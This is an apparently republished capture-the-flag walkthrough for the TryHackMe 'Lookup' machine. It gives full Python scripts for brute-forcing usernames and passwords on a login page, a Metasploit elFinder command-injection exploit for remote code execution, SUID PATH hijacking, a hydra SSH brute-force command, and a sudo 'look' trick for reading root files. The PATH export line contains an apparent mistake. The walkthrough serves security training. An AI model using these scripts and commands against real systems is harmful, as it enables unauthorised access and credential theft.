Lookup: TryHackMe CTF Walkthrough
Lab link: https://tryhackme.com/room/lookupTitle: Test your enumeration skills on this boot-to-root 2026-7-7 11:36:26 Author: infosecwriteups.com(查看原文) 阅读量:6 收藏

Huzaifa Malik

Lab link: https://tryhackme.com/room/lookup

Title: Test your enumeration skills on this boot-to-root machine

Description: Lookup offers a treasure trove of learning opportunities for aspiring hackers. This intriguing machine showcases various real-world vulnerabilities, ranging from web application weaknesses to privilege escalation techniques. By exploring and exploiting these vulnerabilities, hackers can sharpen their skills and gain invaluable experience in ethical hacking. Through “Lookup,” hackers can master the art of reconnaissance, scanning, and enumeration to uncover hidden services and subdomains. They will learn how to exploit web application vulnerabilities, such as command injection, and understand the significance of secure coding practices. The machine also challenges hackers to automate tasks, demonstrating the power of scripting in penetration testing.

Note: It is recommended to use your own VM if you’ll ever experience problems visualizing the site

Press enter or click to view image in full size

AI Generated

1. Scanning & Enumeration

Find open ports: nmap TARGET_IP

Press enter or click to view image in full size

nmap initial scan

Perform version scan to discover more details about the services running on these open ports: nmap -sV -p22,80 TARGET_IP

Press enter or click to view image in full size

discover versions

Web

Visiting the IP address in web browser, did not respond , using wget to make a web request on the target IP address:
wget http://TARGET_IP:80/

Press enter or click to view image in full size

testing web service

From above image it is clear that server is not responding to direct IP address instead expecting a request to a domain lookup.thm

Let’s map the target IP address to this domain lookup.thm in the system /etc/hosts file: sudo vim /etc/hosts

/etc/hosts file

Now, by accessing the http://lookup.thm:80 in a web browser, a login page appears

Press enter or click to view image in full size

lookup.thm

Tried multiple credentials & SQL injection techniques, but login failed & redirected back to the login page

Login Failed

Kept trying, but on submitting the credentials for the username adminthe response differs from the other invalid credentials

Press enter or click to view image in full size

username: admin

The above response displays that the username was correct (in this case admin), this allows us to enumerate all the users of the application

Enumerating Usernames

Using following python script to brute force the login page to enumerate for the valid usernames on the target website

import requests
import urllib3
import sys

#proxies = {'http':'http://127.0.0.1:8080', 'https':'http://127.0.0.1:8080'}
url = "http://lookup.thm/login.php"
GREEN = '\033[32m'
RESET = '\033[0m'

def login_req(url, word):
data = {
"username":"%s" %word,
"password":"pass123"
}
res = requests.post(url=url, data=data, verify=False)
if "Wrong password" in res.text:
sys.stdout.write(GREEN + "\rUsername found: " + word + "\n" + RESET )
elif "Wrong username" in res.text:
sys.stdout.write('\r'+word)
sys.stdout.flush()
else:
sys.stdout.write(res.text)
sys.exit(-1)

if __name__ == "__main__":
if len(sys.argv) != 2:
print("[+] Usage: %s wordlist" %sys.argv[0])
print("[+] Example: %s /usr/share/seclists/Username/Name/names.txt" %sys.argv[0])
sys.exit(-1)
wordlist = sys.argv[1]
with open(wordlist, "r") as wordlist_file:
for line in wordlist_file:
word = line.strip()
login_req(url, word)

Press enter or click to view image in full size

Username Bruteforce

Once usernames found perform brute-force against these two users to find their valid password. Here is the modified version of above script to brute-force the user’s password:

import requests
import urllib3
import sys

#proxies = {'http':'http://127.0.0.1:8080', 'https':'http://127.0.0.1:8080'}
url = "http://lookup.thm/login.php"
# Color constants
RED = '\033[31m'
GREEN = '\033[32m'
RESET = '\033[0m'
def login_req_user(url, user, word):
data = {
"username":"%s" %user,
"password":"%s" %word
}
res = requests.post(url=url, data=data, verify=False)
if "Wrong password" not in res.text and "Wrong username" not in res.text:
print("Credentials Found: " + GREEN + user + " " + RED + word + RESET)
return "Found"
if "Wrong password" in res.text or "Wrong username" in res.text:
print("Credentials: " + GREEN + user + " " + RESET + word)
return "Not Found"

if __name__ == "__main__":
if len(sys.argv) != 3:
print("[+] Usage: %s user wordlist" %sys.argv[0])
sys.exit(-1)
user = sys.argv[1]
wordlist = sys.argv[2]
with open(wordlist, "r") as wordlist_file:
for line in wordlist_file:
word = line.strip()
status = login_req_user(url, user, word)
if status == "Found":
break
if status == "Not Found":
continue

Password for one non-admin user has been found:

Password Found for non-admin user

Using these credentials login to the website, which redirects to another subdomain:

Press enter or click to view image in full size

SUBDOMAIN.lookup.thm

To access this subdomain add it to the /etc/hosts file and refresh the page:

/etc/hosts file

Looking for Vulnerability

Once log in to to the website a file management interface is displayed on the page, but further exploring this page provides the detail about the software running as a file manager. Website is using the elFinder file manager having an outdated version 2.1.47

Press enter or click to view image in full size

elFinder Version

Google search results displayed websites using elFinder Version 2.1.47 are vulnerable to the command injection vulnerability, allowing attacker to perform arbitrary command execution on the system “CVE-2019–9194”

2. Exploitation

Search for the exploit elFinder using Metasploit, make necessary changes and run the exploit to gain RCE on the system

Press enter or click to view image in full size

elfinder exploit

Press enter or click to view image in full size

run exploit to gain RCE

3. Privilege Escalation: think

Search for the SUID binary on the target machine using command: find / -type f -perm -04000 -ls 2>/dev/null
Result from above command contains an uncommon but suspicious SUID binary on the partial compromised system which should be further investigated

Press enter or click to view image in full size

suspicious SUID binary

By running /usr/sbin/pwm shows that it is using command id to display the username & user ID and appends that username to the /home/<USERNAME>/.password to do something with this file

Get Huzaifa Malik’s stories in your inbox

Join Medium for free to get updates from this writer.

Remember me for faster sign in

As the /usr/sbin/pwm is not using absolute path to the /bin/id , instead relying on the environment variable to locate the id command, so attacker can manipulate this SUID binary by exploiting to display any other result when id command is executed by the SUID:

Steps to exploit:

  1. Create a world executable malicious file within the /tmp directory having same name id as a command called by the SUID binary
#!/bin/bash
echo "uid=1000(think) gid=1000(think) groups=1000(think)"

2. Prepend /tmp directory as the first entry to your $PATH environment variable: export PATH=/tmp/id:$PATH

3. Execute the vulnerable SUID: /usr/sbin/pwm

Press enter or click to view image in full size

/usr/sbin/pwm output

The output content can be used as a wordlist to bruteforce another service (SSH) running on this target machine

Create a wordlist from the content displayed by exploiting /usr/sbin/pwm SUID, and run a bruteforce attack against the user think using following command:
hydra -l think -P wordlist_ssh.txt TARGET_IP ssh -t 5

Press enter or click to view image in full size

SSH bruteforce

Once credentials found, login to the ssh as think user and obtain user.txt

user.txt

4. Privilege Escalation: root

Once access gained to the user think, further enumerate the machine to look for privilege escalation to the super user root
Using sudo -l to list commands that user think can run with root privileges:

Press enter or click to view image in full size

sudo binaries

Using /usr/bin/look to read /root/root.txt flag: sudo /usr/bin/look '' /root/root.txt

Press enter or click to view image in full size

root.txt

If you want more walkthroughs on CTF challenges, detailed writeups on Web Hacking and exploitatoin techniques, follow me here on Medium to stay update and get notified


文章来源: https://infosecwriteups.com/lookup-tryhackme-walkthrough-3caf2a7efb45?source=rss----7b722bfd1b8d---4
如有侵权请联系:admin#unsafe.sh